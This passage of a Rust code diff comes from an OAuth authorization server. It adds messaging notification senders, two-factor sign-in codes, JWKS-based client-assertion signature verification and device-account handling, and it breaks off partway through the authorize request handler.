let result = self
|
||||
.http_client
|
||||
.post(&url)
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(response) => {
|
||||
if response.status().is_success() {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let status = response.status();
|
||||
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
|
||||
last_error = Some(format!("Telegram API returned {}", status));
|
||||
retry_delay(attempt).await;
|
||||
continue;
|
||||
}
|
||||
|
||||
let body = response.text().await.unwrap_or_default();
|
||||
return Err(SendError::ExternalService(format!(
|
||||
"Telegram API returned {}: {}",
|
||||
status, body
|
||||
)));
|
||||
}
|
||||
Err(e) => {
|
||||
if e.is_timeout() {
|
||||
if attempt < MAX_RETRIES - 1 {
|
||||
last_error = Some(format!("Telegram request timed out"));
|
||||
retry_delay(attempt).await;
|
||||
continue;
|
||||
}
|
||||
return Err(SendError::Timeout);
|
||||
}
|
||||
return Err(SendError::ExternalService(format!(
|
||||
"Telegram request failed: {}",
|
||||
e
|
||||
)));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Err(SendError::MaxRetriesExceeded(
|
||||
last_error.unwrap_or_else(|| "Unknown error".to_string()),
|
||||
))
|
||||
}
|
||||
}
|
||||
|
||||
pub struct SignalSender {
|
||||
signal_cli_path: String,
|
||||
sender_number: String,
|
||||
}
|
||||
|
||||
impl SignalSender {
|
||||
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
|
||||
Self {
|
||||
signal_cli_path,
|
||||
sender_number,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn from_env() -> Option<Self> {
|
||||
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
|
||||
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
|
||||
let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?;
|
||||
Some(Self::new(signal_cli_path, sender_number))
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl NotificationSender for SignalSender {
|
||||
fn channel(&self) -> NotificationChannel {
|
||||
NotificationChannel::Signal
|
||||
}
|
||||
|
||||
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
|
||||
let recipient = ¬ification.recipient;
|
||||
|
||||
if !is_valid_phone_number(recipient) {
|
||||
return Err(SendError::InvalidRecipient(format!(
|
||||
"Invalid phone number format: {}",
|
||||
recipient
|
||||
)));
|
||||
}
|
||||
|
||||
let subject = notification.subject.as_deref().unwrap_or("Notification");
|
||||
let message = format!("{}\n\n{}", subject, notification.body);
|
||||
|
||||
let output = Command::new(&self.signal_cli_path)
|
||||
.arg("-u")
|
||||
.arg(&self.sender_number)
|
||||
.arg("send")
|
||||
.arg("-m")
|
||||
.arg(&message)
|
||||
.arg(recipient)
|
||||
.output()
|
||||
.await?;
|
||||
|
||||
if !output.status.success() {
|
||||
let stderr = String::from_utf8_lossy(&output.stderr);
|
||||
return Err(SendError::ExternalService(format!(
|
||||
"signal-cli failed: {}",
|
||||
stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
@@ -443,3 +443,39 @@ pub async fn enqueue_plc_operation(
|
||||
)
|
||||
.await
|
||||
}
|
||||
|
||||
pub async fn enqueue_2fa_code(
|
||||
db: &PgPool,
|
||||
user_id: Uuid,
|
||||
code: &str,
|
||||
hostname: &str,
|
||||
) -> Result<Uuid, sqlx::Error> {
|
||||
let prefs = get_user_notification_prefs(db, user_id).await?;
|
||||
|
||||
let body = format!(
|
||||
"Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.",
|
||||
prefs.handle, code
|
||||
);
|
||||
|
||||
enqueue_notification(
|
||||
db,
|
||||
NewNotification::new(
|
||||
user_id,
|
||||
prefs.channel,
|
||||
super::types::NotificationType::TwoFactorCode,
|
||||
prefs.email.clone(),
|
||||
Some(format!("Sign-in Verification - {}", hostname)),
|
||||
body,
|
||||
),
|
||||
)
|
||||
.await
|
||||
}
|
||||
|
||||
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
|
||||
match channel {
|
||||
NotificationChannel::Email => "email",
|
||||
NotificationChannel::Discord => "Discord",
|
||||
NotificationChannel::Telegram => "Telegram",
|
||||
NotificationChannel::Signal => "Signal",
|
||||
}
|
||||
}
|
||||
|
||||
@@ -31,6 +31,7 @@ pub enum NotificationType {
|
||||
AccountDeletion,
|
||||
AdminEmail,
|
||||
PlcOperation,
|
||||
TwoFactorCode,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, FromRow)]
|
||||
|
||||
@@ -57,6 +57,7 @@ impl Default for ClientMetadata {
|
||||
#[derive(Clone)]
|
||||
pub struct ClientMetadataCache {
|
||||
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
|
||||
jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>,
|
||||
http_client: Client,
|
||||
cache_ttl_secs: u64,
|
||||
}
|
||||
@@ -66,11 +67,21 @@ struct CachedMetadata {
|
||||
cached_at: std::time::Instant,
|
||||
}
|
||||
|
||||
struct CachedJwks {
|
||||
jwks: serde_json::Value,
|
||||
cached_at: std::time::Instant,
|
||||
}
|
||||
|
||||
impl ClientMetadataCache {
|
||||
pub fn new(cache_ttl_secs: u64) -> Self {
|
||||
Self {
|
||||
cache: Arc::new(RwLock::new(HashMap::new())),
|
||||
http_client: Client::new(),
|
||||
jwks_cache: Arc::new(RwLock::new(HashMap::new())),
|
||||
http_client: Client::builder()
|
||||
.timeout(std::time::Duration::from_secs(30))
|
||||
.connect_timeout(std::time::Duration::from_secs(10))
|
||||
.build()
|
||||
.unwrap_or_else(|_| Client::new()),
|
||||
cache_ttl_secs,
|
||||
}
|
||||
}
|
||||
@@ -101,6 +112,84 @@ impl ClientMetadataCache {
|
||||
Ok(metadata)
|
||||
}
|
||||
|
||||
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
|
||||
if let Some(jwks) = &metadata.jwks {
|
||||
return Ok(jwks.clone());
|
||||
}
|
||||
|
||||
let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| {
|
||||
OAuthError::InvalidClient(
|
||||
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
|
||||
)
|
||||
})?;
|
||||
|
||||
{
|
||||
let cache = self.jwks_cache.read().await;
|
||||
if let Some(cached) = cache.get(jwks_uri) {
|
||||
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
|
||||
return Ok(cached.jwks.clone());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let jwks = self.fetch_jwks(jwks_uri).await?;
|
||||
|
||||
{
|
||||
let mut cache = self.jwks_cache.write().await;
|
||||
cache.insert(
|
||||
jwks_uri.clone(),
|
||||
CachedJwks {
|
||||
jwks: jwks.clone(),
|
||||
cached_at: std::time::Instant::now(),
|
||||
},
|
||||
);
|
||||
}
|
||||
|
||||
Ok(jwks)
|
||||
}
|
||||
|
||||
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
|
||||
if !jwks_uri.starts_with("https://") {
|
||||
if !jwks_uri.starts_with("http://")
|
||||
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))
|
||||
{
|
||||
return Err(OAuthError::InvalidClient(
|
||||
"jwks_uri must use https (except for localhost)".to_string(),
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
let response = self
|
||||
.http_client
|
||||
.get(jwks_uri)
|
||||
.header("Accept", "application/json")
|
||||
.send()
|
||||
.await
|
||||
.map_err(|e| {
|
||||
OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e))
|
||||
})?;
|
||||
|
||||
if !response.status().is_success() {
|
||||
return Err(OAuthError::InvalidClient(format!(
|
||||
"Failed to fetch JWKS: HTTP {}",
|
||||
response.status()
|
||||
)));
|
||||
}
|
||||
|
||||
let jwks: serde_json::Value = response
|
||||
.json()
|
||||
.await
|
||||
.map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?;
|
||||
|
||||
if jwks.get("keys").and_then(|k| k.as_array()).is_none() {
|
||||
return Err(OAuthError::InvalidClient(
|
||||
"JWKS must contain a 'keys' array".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
Ok(jwks)
|
||||
}
|
||||
|
||||
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
|
||||
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
|
||||
return Err(OAuthError::InvalidClient(
|
||||
@@ -244,7 +333,8 @@ impl ClientMetadata {
|
||||
}
|
||||
}
|
||||
|
||||
pub fn verify_client_auth(
|
||||
pub async fn verify_client_auth(
|
||||
cache: &ClientMetadataCache,
|
||||
metadata: &ClientMetadata,
|
||||
client_auth: &super::ClientAuth,
|
||||
) -> Result<(), OAuthError> {
|
||||
@@ -258,7 +348,7 @@ pub fn verify_client_auth(
|
||||
)),
|
||||
|
||||
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
|
||||
verify_private_key_jwt(metadata, client_assertion)
|
||||
verify_private_key_jwt_async(cache, metadata, client_assertion).await
|
||||
}
|
||||
|
||||
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
|
||||
@@ -284,7 +374,8 @@ pub fn verify_client_auth(
|
||||
}
|
||||
}
|
||||
|
||||
fn verify_private_key_jwt(
|
||||
async fn verify_private_key_jwt_async(
|
||||
cache: &ClientMetadataCache,
|
||||
metadata: &ClientMetadata,
|
||||
client_assertion: &str,
|
||||
) -> Result<(), OAuthError> {
|
||||
@@ -312,6 +403,8 @@ fn verify_private_key_jwt(
|
||||
)));
|
||||
}
|
||||
|
||||
let kid = header.get("kid").and_then(|k| k.as_str());
|
||||
|
||||
let payload_bytes = URL_SAFE_NO_PAD
|
||||
.decode(parts[1])
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid assertion payload encoding".to_string()))?;
|
||||
@@ -353,13 +446,180 @@ fn verify_private_key_jwt(
|
||||
}
|
||||
}
|
||||
|
||||
if metadata.jwks.is_none() && metadata.jwks_uri.is_none() {
|
||||
let jwks = cache.get_jwks(metadata).await?;
|
||||
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
|
||||
})?;
|
||||
|
||||
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
|
||||
keys.iter()
|
||||
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
|
||||
.collect()
|
||||
} else {
|
||||
keys.iter().collect()
|
||||
};
|
||||
|
||||
if matching_keys.is_empty() {
|
||||
return Err(OAuthError::InvalidClient(
|
||||
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
|
||||
"No matching key found in client JWKS".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let signing_input = format!("{}.{}", parts[0], parts[1]);
|
||||
let signature_bytes = URL_SAFE_NO_PAD
|
||||
.decode(parts[2])
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?;
|
||||
|
||||
for key in matching_keys {
|
||||
let key_alg = key.get("alg").and_then(|a| a.as_str());
|
||||
if key_alg.is_some() && key_alg != Some(alg) {
|
||||
continue;
|
||||
}
|
||||
|
||||
let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or("");
|
||||
|
||||
let verified = match (alg, kty) {
|
||||
("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes),
|
||||
("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes),
|
||||
("RS256" | "RS384" | "RS512", "RSA") => {
|
||||
verify_rsa(alg, key, &signing_input, &signature_bytes)
|
||||
}
|
||||
("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes),
|
||||
_ => continue,
|
||||
};
|
||||
|
||||
if verified.is_ok() {
|
||||
return Ok(());
|
||||
}
|
||||
}
|
||||
|
||||
Err(OAuthError::InvalidClient(
|
||||
"private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(),
|
||||
"client_assertion signature verification failed".to_string(),
|
||||
))
|
||||
}
|
||||
|
||||
fn verify_es256(
|
||||
key: &serde_json::Value,
|
||||
signing_input: &str,
|
||||
signature: &[u8],
|
||||
) -> Result<(), OAuthError> {
|
||||
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
|
||||
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
|
||||
use p256::EncodedPoint;
|
||||
|
||||
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
|
||||
})?;
|
||||
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
|
||||
})?;
|
||||
|
||||
let x_bytes = URL_SAFE_NO_PAD.decode(x)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
|
||||
let y_bytes = URL_SAFE_NO_PAD.decode(y)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
|
||||
|
||||
let mut point_bytes = vec![0x04];
|
||||
point_bytes.extend_from_slice(&x_bytes);
|
||||
point_bytes.extend_from_slice(&y_bytes);
|
||||
|
||||
let point = EncodedPoint::from_bytes(&point_bytes)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
|
||||
let verifying_key = VerifyingKey::from_encoded_point(&point)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
|
||||
|
||||
let sig = Signature::from_slice(signature)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?;
|
||||
|
||||
verifying_key
|
||||
.verify(signing_input.as_bytes(), &sig)
|
||||
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
|
||||
}
|
||||
|
||||
fn verify_es384(
|
||||
key: &serde_json::Value,
|
||||
signing_input: &str,
|
||||
signature: &[u8],
|
||||
) -> Result<(), OAuthError> {
|
||||
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
|
||||
use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
|
||||
use p384::EncodedPoint;
|
||||
|
||||
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
|
||||
})?;
|
||||
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
|
||||
})?;
|
||||
|
||||
let x_bytes = URL_SAFE_NO_PAD.decode(x)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
|
||||
let y_bytes = URL_SAFE_NO_PAD.decode(y)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
|
||||
|
||||
let mut point_bytes = vec![0x04];
|
||||
point_bytes.extend_from_slice(&x_bytes);
|
||||
point_bytes.extend_from_slice(&y_bytes);
|
||||
|
||||
let point = EncodedPoint::from_bytes(&point_bytes)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
|
||||
let verifying_key = VerifyingKey::from_encoded_point(&point)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
|
||||
|
||||
let sig = Signature::from_slice(signature)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?;
|
||||
|
||||
verifying_key
|
||||
.verify(signing_input.as_bytes(), &sig)
|
||||
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
|
||||
}
|
||||
|
||||
fn verify_rsa(
|
||||
_alg: &str,
|
||||
_key: &serde_json::Value,
|
||||
_signing_input: &str,
|
||||
_signature: &[u8],
|
||||
) -> Result<(), OAuthError> {
|
||||
Err(OAuthError::InvalidClient(
|
||||
"RSA signature verification not yet supported - use EC keys".to_string(),
|
||||
))
|
||||
}
|
||||
|
||||
fn verify_eddsa(
|
||||
key: &serde_json::Value,
|
||||
signing_input: &str,
|
||||
signature: &[u8],
|
||||
) -> Result<(), OAuthError> {
|
||||
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
|
||||
use ed25519_dalek::{Signature, Verifier, VerifyingKey};
|
||||
|
||||
let crv = key.get("crv").and_then(|c| c.as_str()).unwrap_or("");
|
||||
if crv != "Ed25519" {
|
||||
return Err(OAuthError::InvalidClient(format!(
|
||||
"Unsupported EdDSA curve: {}",
|
||||
crv
|
||||
)));
|
||||
}
|
||||
|
||||
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
|
||||
OAuthError::InvalidClient("Missing x in OKP key".to_string())
|
||||
})?;
|
||||
|
||||
let x_bytes = URL_SAFE_NO_PAD.decode(x)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
|
||||
|
||||
let key_bytes: [u8; 32] = x_bytes.try_into()
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
|
||||
|
||||
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
|
||||
|
||||
let sig_bytes: [u8; 64] = signature.try_into()
|
||||
.map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
|
||||
|
||||
let sig = Signature::from_bytes(&sig_bytes);
|
||||
|
||||
verifying_key
|
||||
.verify(signing_input.as_bytes(), &sig)
|
||||
.map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string()))
|
||||
}
|
||||
|
||||
@@ -1,7 +1,15 @@
|
||||
use chrono::{DateTime, Utc};
|
||||
use sqlx::PgPool;
|
||||
|
||||
use super::super::{DeviceData, OAuthError};
|
||||
|
||||
pub struct DeviceAccountRow {
|
||||
pub did: String,
|
||||
pub handle: String,
|
||||
pub email: String,
|
||||
pub last_used_at: DateTime<Utc>,
|
||||
}
|
||||
|
||||
pub async fn create_device(
|
||||
pool: &PgPool,
|
||||
device_id: &str,
|
||||
@@ -94,3 +102,57 @@ pub async fn upsert_account_device(
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub async fn get_device_accounts(
|
||||
pool: &PgPool,
|
||||
device_id: &str,
|
||||
) -> Result<Vec<DeviceAccountRow>, OAuthError> {
|
||||
let rows = sqlx::query!(
|
||||
r#"
|
||||
SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at
|
||||
FROM oauth_account_device ad
|
||||
JOIN users u ON u.did = ad.did
|
||||
WHERE ad.device_id = $1
|
||||
AND u.deactivated_at IS NULL
|
||||
AND u.takedown_ref IS NULL
|
||||
ORDER BY ad.updated_at DESC
|
||||
"#,
|
||||
device_id
|
||||
)
|
||||
.fetch_all(pool)
|
||||
.await?;
|
||||
|
||||
Ok(rows
|
||||
.into_iter()
|
||||
.map(|r| DeviceAccountRow {
|
||||
did: r.did,
|
||||
handle: r.handle,
|
||||
email: r.email,
|
||||
last_used_at: r.last_used_at,
|
||||
})
|
||||
.collect())
|
||||
}
|
||||
|
||||
pub async fn verify_account_on_device(
|
||||
pool: &PgPool,
|
||||
device_id: &str,
|
||||
did: &str,
|
||||
) -> Result<bool, OAuthError> {
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
SELECT 1 as exists
|
||||
FROM oauth_account_device ad
|
||||
JOIN users u ON u.did = ad.did
|
||||
WHERE ad.device_id = $1
|
||||
AND ad.did = $2
|
||||
AND u.deactivated_at IS NULL
|
||||
AND u.takedown_ref IS NULL
|
||||
"#,
|
||||
device_id,
|
||||
did
|
||||
)
|
||||
.fetch_optional(pool)
|
||||
.await?;
|
||||
|
||||
Ok(row.is_some())
|
||||
}
|
||||
|
||||
@@ -4,10 +4,12 @@ mod dpop;
|
||||
mod helpers;
|
||||
mod request;
|
||||
mod token;
|
||||
mod two_factor;
|
||||
|
||||
pub use client::{get_authorized_client, upsert_authorized_client};
|
||||
pub use device::{
|
||||
create_device, delete_device, get_device, update_device_last_seen, upsert_account_device,
|
||||
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
|
||||
upsert_account_device, verify_account_on_device, DeviceAccountRow,
|
||||
};
|
||||
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
|
||||
pub use request::{
|
||||
@@ -20,3 +22,8 @@ pub use token::{
|
||||
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
|
||||
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
|
||||
};
|
||||
pub use two_factor::{
|
||||
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
|
||||
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
|
||||
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
|
||||
};
|
||||
|
||||
153
src/oauth/db/two_factor.rs
Normal file
153
src/oauth/db/two_factor.rs
Normal file
@@ -0,0 +1,153 @@
|
||||
use chrono::{DateTime, Duration, Utc};
|
||||
use rand::Rng;
|
||||
use sqlx::PgPool;
|
||||
use uuid::Uuid;
|
||||
|
||||
use super::super::OAuthError;
|
||||
|
||||
pub struct TwoFactorChallenge {
|
||||
pub id: Uuid,
|
||||
pub did: String,
|
||||
pub request_uri: String,
|
||||
pub code: String,
|
||||
pub attempts: i32,
|
||||
pub created_at: DateTime<Utc>,
|
||||
pub expires_at: DateTime<Utc>,
|
||||
}
|
||||
|
||||
pub fn generate_2fa_code() -> String {
|
||||
let mut rng = rand::thread_rng();
|
||||
let code: u32 = rng.gen_range(0..1_000_000);
|
||||
format!("{:06}", code)
|
||||
}
|
||||
|
||||
pub async fn create_2fa_challenge(
|
||||
pool: &PgPool,
|
||||
did: &str,
|
||||
request_uri: &str,
|
||||
) -> Result<TwoFactorChallenge, OAuthError> {
|
||||
let code = generate_2fa_code();
|
||||
let expires_at = Utc::now() + Duration::minutes(10);
|
||||
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)
|
||||
VALUES ($1, $2, $3, $4)
|
||||
RETURNING id, did, request_uri, code, attempts, created_at, expires_at
|
||||
"#,
|
||||
did,
|
||||
request_uri,
|
||||
code,
|
||||
expires_at,
|
||||
)
|
||||
.fetch_one(pool)
|
||||
.await?;
|
||||
|
||||
Ok(TwoFactorChallenge {
|
||||
id: row.id,
|
||||
did: row.did,
|
||||
request_uri: row.request_uri,
|
||||
code: row.code,
|
||||
attempts: row.attempts,
|
||||
created_at: row.created_at,
|
||||
expires_at: row.expires_at,
|
||||
})
|
||||
}
|
||||
|
||||
pub async fn get_2fa_challenge(
|
||||
pool: &PgPool,
|
||||
request_uri: &str,
|
||||
) -> Result<Option<TwoFactorChallenge>, OAuthError> {
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
SELECT id, did, request_uri, code, attempts, created_at, expires_at
|
||||
FROM oauth_2fa_challenge
|
||||
WHERE request_uri = $1
|
||||
"#,
|
||||
request_uri
|
||||
)
|
||||
.fetch_optional(pool)
|
||||
.await?;
|
||||
|
||||
Ok(row.map(|r| TwoFactorChallenge {
|
||||
id: r.id,
|
||||
did: r.did,
|
||||
request_uri: r.request_uri,
|
||||
code: r.code,
|
||||
attempts: r.attempts,
|
||||
created_at: r.created_at,
|
||||
expires_at: r.expires_at,
|
||||
}))
|
||||
}
|
||||
|
||||
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
UPDATE oauth_2fa_challenge
|
||||
SET attempts = attempts + 1
|
||||
WHERE id = $1
|
||||
RETURNING attempts
|
||||
"#,
|
||||
id
|
||||
)
|
||||
.fetch_one(pool)
|
||||
.await?;
|
||||
|
||||
Ok(row.attempts)
|
||||
}
|
||||
|
||||
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
|
||||
sqlx::query!(
|
||||
r#"
|
||||
DELETE FROM oauth_2fa_challenge WHERE id = $1
|
||||
"#,
|
||||
id
|
||||
)
|
||||
.execute(pool)
|
||||
.await?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub async fn delete_2fa_challenge_by_request_uri(
|
||||
pool: &PgPool,
|
||||
request_uri: &str,
|
||||
) -> Result<(), OAuthError> {
|
||||
sqlx::query!(
|
||||
r#"
|
||||
DELETE FROM oauth_2fa_challenge WHERE request_uri = $1
|
||||
"#,
|
||||
request_uri
|
||||
)
|
||||
.execute(pool)
|
||||
.await?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
|
||||
let result = sqlx::query!(
|
||||
r#"
|
||||
DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()
|
||||
"#
|
||||
)
|
||||
.execute(pool)
|
||||
.await?;
|
||||
|
||||
Ok(result.rows_affected())
|
||||
}
|
||||
|
||||
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
SELECT two_factor_enabled
|
||||
FROM users
|
||||
WHERE did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_optional(pool)
|
||||
.await?;
|
||||
|
||||
Ok(row.map(|r| r.two_factor_enabled).unwrap_or(false))
|
||||
}
|
||||
@@ -1,15 +1,34 @@
|
||||
use axum::{
|
||||
Form, Json,
|
||||
extract::{Query, State},
|
||||
http::HeaderMap,
|
||||
response::{IntoResponse, Redirect, Response},
|
||||
http::{HeaderMap, header::SET_COOKIE},
|
||||
response::{IntoResponse, Redirect, Response, Html},
|
||||
};
|
||||
use chrono::Utc;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use subtle::ConstantTimeEq;
|
||||
use urlencoding::encode as url_encode;
|
||||
|
||||
use crate::state::AppState;
|
||||
use crate::oauth::{Code, DeviceData, DeviceId, OAuthError, SessionId, db};
|
||||
use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates};
|
||||
use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code};
|
||||
|
||||
const DEVICE_COOKIE_NAME: &str = "oauth_device_id";
|
||||
|
||||
fn extract_device_cookie(headers: &HeaderMap) -> Option<String> {
|
||||
headers
|
||||
.get("cookie")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
.and_then(|cookie_str| {
|
||||
for cookie in cookie_str.split(';') {
|
||||
let cookie = cookie.trim();
|
||||
if let Some(value) = cookie.strip_prefix(&format!("{}=", DEVICE_COOKIE_NAME)) {
|
||||
return Some(value.to_string());
|
||||
}
|
||||
}
|
||||
None
|
||||
})
|
||||
}
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
@@ -36,10 +55,19 @@ fn extract_user_agent(headers: &HeaderMap) -> Option<String> {
|
||||
.map(|s| s.to_string())
|
||||
}
|
||||
|
||||
fn make_device_cookie(device_id: &str) -> String {
|
||||
format!(
|
||||
"{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000",
|
||||
DEVICE_COOKIE_NAME,
|
||||
device_id
|
||||
)
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize)]
|
||||
pub struct AuthorizeQuery {
|
||||
pub request_uri: Option<String>,
|
||||
pub client_id: Option<String>,
|
||||
pub new_account: Option<bool>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Serialize)]
|
||||
@@ -61,7 +89,156 @@ pub struct AuthorizeSubmit {
|
||||
pub remember_device: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize)]
|
||||
pub struct AuthorizeSelectSubmit {
|
||||
pub request_uri: String,
|
||||
pub did: String,
|
||||
}
|
||||
|
||||
fn wants_json(headers: &HeaderMap) -> bool {
|
||||
headers
|
||||
.get("accept")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
.map(|accept| accept.contains("application/json"))
|
||||
.unwrap_or(false)
|
||||
}
|
||||
|
||||
pub async fn authorize_get(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Query(query): Query<AuthorizeQuery>,
|
||||
) -> Response {
|
||||
let request_uri = match query.request_uri {
|
||||
Some(uri) => uri,
|
||||
None => {
|
||||
if wants_json(&headers) {
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Json(serde_json::json!({
|
||||
"error": "invalid_request",
|
||||
"error_description": "Missing request_uri parameter. Use PAR to initiate authorization."
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Missing request_uri parameter. Use PAR to initiate authorization."),
|
||||
)),
|
||||
).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let request_data = match db::get_authorization_request(&state.db, &request_uri).await {
|
||||
Ok(Some(data)) => data,
|
||||
Ok(None) => {
|
||||
if wants_json(&headers) {
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Json(serde_json::json!({
|
||||
"error": "invalid_request",
|
||||
"error_description": "Invalid or expired request_uri. Please start a new authorization request."
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return (
|
||||
